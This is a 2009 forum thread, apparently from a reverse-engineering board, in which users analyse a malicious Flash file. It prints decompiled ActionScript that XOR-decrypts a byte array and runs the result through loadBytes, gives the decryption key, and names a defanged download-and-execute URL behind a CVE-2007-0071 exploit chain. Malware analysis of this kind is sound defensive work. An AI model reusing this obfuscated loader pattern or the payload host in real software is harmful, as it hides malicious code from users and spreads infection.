PDA

View Full Version : swf exploit


BATMAN
November 4th, 2009, 16:31
I use Sothic SWF Decompiler and i've got this
Code:

package
{
import flash.display.*;
import flash.events.*;
import flash.utils.*;
import fromFactLooks.*;

public class fromFactLooks extends Sprite
{

public function fromFactLooks()
{
var readerTypeNot:Loader;
var sArr:* = new Array();
sArr[0] = "0x72";
sArr[1] = "0x63";
sArr[2] = "0x64";
sArr[3] = "0x3e";
sArr[4] = "0xc1";
sArr[5] = "0xf7";
sArr[6] = "0x64";
sArr[7] = "0x62";
sArr[8] = "0x48";
sArr[9] = "0xed";
sArr[10] = "0xdc";
sArr[11] = "0x49";
sArr[12] = "0x3e";
sArr[13] = "0x4b";
sArr[14] = "0x2f";
sArr[15] = "0xef";
sArr[16] = "0x47";
sArr[17] = "0xd2";


.........................................


var itsPieceNot:* = new ByteArray();
var oneNormalThe:Number;
var alsoThePiece:String;
var i:Number;
while (i < sArr.length)
{

var _loc_2:* = alsoThePiece;
oneNormalThe = oneNormalThe++;
itsPieceNot[I] = sArr[I] ^ _loc_2.alsoThePiece["charCodeAt"](oneNormalThe);
if (oneNormalThe >= alsoThePiece.length)
{
oneNormalThe;
}
i = i++;
}
readerTypeNot = new Loader();
addChild(readerTypeNot);
try
{
var _loc_2:* = readerTypeNot["loaderInfo"];
_loc_2.readerTypeNot["loaderInfo"]["addEventListener"](Event.COMPLETE, function (event:Event) : void
{
upUseEver(event, readerTypeNot);
return;
}// end function
);
var _loc_2:* = readerTypeNot;
_loc_2.readerTypeNot["loadBytes"](itsPieceNot);
}
catch (e:Error)
{
trace(e);
}
return;
}// end function

private function upUseEver(event:Event, C:\Documents and Settings\Loner\Desktop\new\bilder;;fromFactLooks.as:Loader) : void
{
trace(event);
return;
}// end function

}
}


How can I get malicious url? What to do next???

Can anybody help with this ?

binjo
November 4th, 2009, 22:23
Hi,

This as script basically does follows:

1. loop decrypt the array "sArr" with its key "alsoThePiece".
2. load the dercypted bytes with "loadBytes", it's another compressed SWF file.
3. the loaded swf "drops&loadBytes" 12 other SWF files, which leverage the vulnerability of CVE-2007-0071
4. download and executes payload, the typical activity of malicious swf.
the url is : hxxp://zyejanag.cn/rf/update.php?id=3, host not found though

I've attached all the decrypted samples and tools I used, in case you want to do it yourself. PASSWORD is : y0

Cheers

BATMAN
November 5th, 2009, 06:42
Ohh thnx !!Can you write more about how you get url ?=\

binjo
November 5th, 2009, 22:42
Try load the attached 0x0.idb into IDA, and you will find it out yourself. ;-p

h4h4h4h4
December 4th, 2009, 17:50
Thanks for your insight Binjo. I learned a lot from your post and thanks for sharing your python scripts.

One question tho, how did you find the key value for "alsoThePiece"

In the dec_fromFactLooks.py script it has:

alsoThePiece = "147702db07145348245dc5a2f2fe5683"

How did you calculate/find that?

Also, the other script, extract_swf_byte.py doesn't seem to do anything. I tried piping its output to a file and running it with the fromFactLooks.swf file and nothing happens.

I loaded the .idb file in IDA and saw the download url, thanks for sharing that. Im just wondering how you got to that point

Sorry this is 2 months late, just saw post now.
Thanks,

h4h4h4h4
December 4th, 2009, 19:21
I think i found the code where it stores the key.

Code:

var itsPieceNot:* = new ByteArray();
var oneNormalThe:Number;
var alsoThePiece:String;
var i:Number;
while (i < sArr.length)
{

var _loc_2:* = alsoThePiece;
oneNormalThe = (oneNormalThe + 1);
itsPieceNot[I] = sArr[I] ^ _loc_2.alsoThePiece["charCodeAt"](oneNormalThe);
if (oneNormalThe >= alsoThePiece.length)
{
oneNormalThe;
}
i = (i + 1);



It looks like it takes array sArr[I] and does a bitwise XOR with alsoThePiece and uses a unicode/ascii "charCodeAt" formula, but im lost as to the logic of what its trying to do and how it is performing the XOR/decoding process.

binjo
December 7th, 2009, 01:37
Hi, h4h4h4h4

About the magic word of "alsoThePiece", yes, you're right, it iterates and XOR each item of sArr with item of alsoThePiece.
My script, extract_swf_byte.py, tries to find "465753" in the decrypted swf file and pack according to the length. "465753" is the hex of "FWS", header of swf format, though it's plain text. That's how the 3rd layer encryption deployed.
For how to use it, try this in your cmd/shell: python extract_swf_byte.py dec_fromFactLooks.swf x0.swf_, it will generates 0x0.swf_, 1x0.swf_ and so on.

Bye.